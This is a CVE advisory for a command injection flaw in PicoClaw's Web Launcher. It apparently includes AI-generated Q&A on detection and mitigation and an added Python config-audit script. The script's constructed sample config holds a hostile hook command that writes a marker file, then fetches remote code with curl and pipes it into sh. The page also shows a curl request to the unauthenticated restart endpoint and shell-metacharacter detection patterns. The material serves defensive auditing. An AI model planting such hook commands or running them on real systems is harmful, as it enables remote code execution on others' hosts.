CVE-2026-6987
Status: Received - Intake
Remote Command Injection in PicoClaw Web Launcher Management Plane

Publication date: 2026-04-25

Last updated on: 2026-05-01

Assigner: VulDB

Description
A vulnerability was found in PicoClaw versions up to and including 0.2.4. An unknown function of the file /api/gateway/restart in the Web Launcher Management Plane component is affected. Manipulating the request results in command injection, and the attack can be launched remotely. The project was informed of the problem early through an issue report but has not responded yet; no fixed version is listed on this page.
Meta Information
Published: 2026-04-25
Last Modified: 2026-05-01
Generated: 2026-05-07
AI Q&A: 2026-04-26
EPSS Evaluated: 2026-05-05
Affected Vendors & Products (1 associated CPE)
Vendor: sipeed
Product: picoclaw
Version / Range: up to 0.2.4 (inclusive)
CWE ID and description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-6987 in PicoClaw versions up to and including 0.2.4 is an unauthenticated remote code execution issue reachable through the Web Launcher management plane.

Specifically, an unauthenticated client can modify the config.json file and write arbitrary commands into the hooks.processes[*].command field.

After planting the commands, an unauthenticated POST request to /api/gateway/restart restarts the gateway, and the planted commands execute immediately as process hooks.

Exploitation requires that the management plane be reachable by the attacker: PicoClaw started with the -public flag, or deployed so that the management plane is reachable from the attacker's network segment, combined with an allowed_cidrs setting that is either empty or includes the attacker's IP address.

The root cause is the lack of authentication on the management plane together with insufficient validation of the hook command values; the two combined let a remote attacker execute arbitrary commands on the host.


How can this vulnerability impact me?

An attacker who can reach the management plane can execute arbitrary commands on the affected system without authenticating.

Such remote code execution can lead to full system compromise, unauthorized access to sensitive data, disruption of services, and use of the host as a foothold for further attacks.

Because the attacker triggers the planted commands by restarting the gateway through the same unauthenticated interface, the impact is immediate: no separate trigger or timing condition is needed.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Start by checking whether the PicoClaw management interface is reachable without authentication, in particular whether the launcher runs with the -public flag or sits on a network segment other hosts can reach while allowed_cidrs is empty or permissive.

Next, look in request logs for POST requests to /api/gateway/restart that did not come from an expected operator address; in this attack chain the restart is the step that triggers the injected commands, so an unexpected restart request is a strong indicator.

Finally, inspect config.json for unexpected values in the hooks.processes[*].command field. A hook command an operator did not configure, or one containing shell metacharacters such as ;, |, && or $( ), indicates tampering.

  • Check whether the restart endpoint answers an unauthenticated request. Do this only on a system you own, because a successful call restarts the gateway: curl -i -X POST http://<target-ip>/api/gateway/restart
  • List the hook commands in config.json with jq rather than grep, since hooks.processes is a JSON path and not a literal string that appears in the file: jq '.hooks.processes[]?.command' /path/to/config.json
  • Check the running launcher's command line for the -public flag (assuming the binary is named picoclaw): ps -eo pid,args | grep '[p]icoclaw'
  • Scan the network for open PicoClaw management interfaces and confirm each one either requires authentication or is restricted by a non-empty allowed_cidrs.

What immediate steps should I take to mitigate this vulnerability?

No fixed version is listed on this page, so immediate mitigation is about reducing exposure rather than upgrading. Do not start the PicoClaw launcher with the -public flag, and populate allowed_cidrs with only the operator addresses that need management access; never leave it empty.

Place the management interface behind an authenticating reverse proxy, a VPN, or host firewall rules so that unauthenticated clients cannot reach /api/gateway/restart or the configuration endpoints at all.

Review config.json, in particular hooks.processes[*].command, for entries you did not configure, and treat any unexpected hook as evidence that the host may already have been compromised rather than as a configuration mistake.

For the project itself, the durable fix is mandatory authentication on the management plane and strict validation of hook command values before they are executed.
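The following is an added audit script, not code from PicoClaw or from this advisory, that checks a config.json for the two conditions the detection and mitigation answers above describe: an empty or catch-all allowed_cidrs, and hooks.processes[*].command entries carrying shell metacharacters. It assumes allowed_cidrs is a top-level list of CIDR strings and hooks.processes is a list of objects with a command key; both layouts are inferred from the field names on this page, not from the PicoClaw source, so adjust the key paths if your file differs. The two sample configurations are constructed for the example.

```python
"""Audit a PicoClaw-style config.json for the exposure described in CVE-2026-6987.

Added example, not PicoClaw project code. The key paths allowed_cidrs and
hooks.processes[*].command are assumed from the field names in the advisory.
"""
import ipaddress
import json
import re
from typing import List, Optional

# Characters and sequences that let a command string do more than launch one
# program if it is ever handed to a shell: separators, pipes, redirects,
# command substitution and embedded newlines.
SHELL_META = re.compile(r"[;&|`<>\n]|\$\(|\$\{")


def audit_config(config: dict, untrusted_ip: Optional[str] = None) -> List[str]:
    """Return human-readable findings; an empty list means the config looks clean.

    untrusted_ip, if given, is an address you do not want to have management
    access (for example a suspected attacker source); a finding is raised if
    any allowed_cidrs entry admits it.
    """
    findings: List[str] = []

    cidrs = config.get("allowed_cidrs") or []
    if not cidrs:
        findings.append("allowed_cidrs is empty: any client that can connect is accepted")
    for cidr in cidrs:
        try:
            net = ipaddress.ip_network(cidr, strict=False)
        except ValueError:
            findings.append(f"allowed_cidrs entry is not a valid CIDR: {cidr!r}")
            continue
        if net.prefixlen == 0:
            findings.append(f"allowed_cidrs contains a catch-all network: {cidr}")
        elif untrusted_ip is not None and ipaddress.ip_address(untrusted_ip) in net:
            findings.append(f"allowed_cidrs entry {cidr} admits untrusted client {untrusted_ip}")

    hooks = (config.get("hooks") or {}).get("processes") or []
    for idx, hook in enumerate(hooks):
        cmd = str(hook.get("command", ""))
        if SHELL_META.search(cmd):
            findings.append(
                f"hooks.processes[{idx}].command contains shell metacharacters: {cmd!r}"
            )
    return findings


def audit_file(path: str, untrusted_ip: Optional[str] = None) -> List[str]:
    """Load config.json from disk and audit it."""
    with open(path, "r", encoding="utf-8") as fh:
        return audit_config(json.load(fh), untrusted_ip)


# Constructed sample: the exposed shape (empty allowed_cidrs, one tampered hook).
WEAK_CONFIG = {
    "allowed_cidrs": [],
    "hooks": {
        "processes": [
            {"name": "logger", "command": "/usr/local/bin/picoclaw-log"},
            {"name": "sync", "command": "/bin/sh -c 'id > /tmp/pwned; curl http://203.0.113.9/x | sh'"},
        ]
    },
}

# Constructed sample: the hardened shape (operator subnet only, plain commands).
HARDENED_CONFIG = {
    "allowed_cidrs": ["10.0.0.0/24"],
    "hooks": {"processes": [{"name": "logger", "command": "/usr/local/bin/picoclaw-log"}]},
}

if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = audit_file(target) if target else audit_config(WEAK_CONFIG)
    for line in results:
        print("FINDING:", line)
    sys.exit(1 if results else 0)
```

Run it as `python audit_picoclaw.py /path/to/config.json`; a non-zero exit status means at least one finding, which makes it easy to drop into a cron job or a fleet-wide check. The metacharacter test is a heuristic: a legitimately configured hook could contain a pipe, so treat hits as items to review against what the operator actually configured rather than as proof of compromise.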


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability allows unauthenticated remote code execution via the management interface, which can lead to unauthorized access to and control over the affected system.

Such unauthorized access, and the data manipulation or exposure that can follow from it, could negatively affect compliance with standards and regulations like GDPR and HIPAA, which require strict controls over data confidentiality, integrity, and access.

Specifically, the missing authentication and input validation described above could result in breaches of personal or sensitive data, violating regulatory requirements for protecting such information.

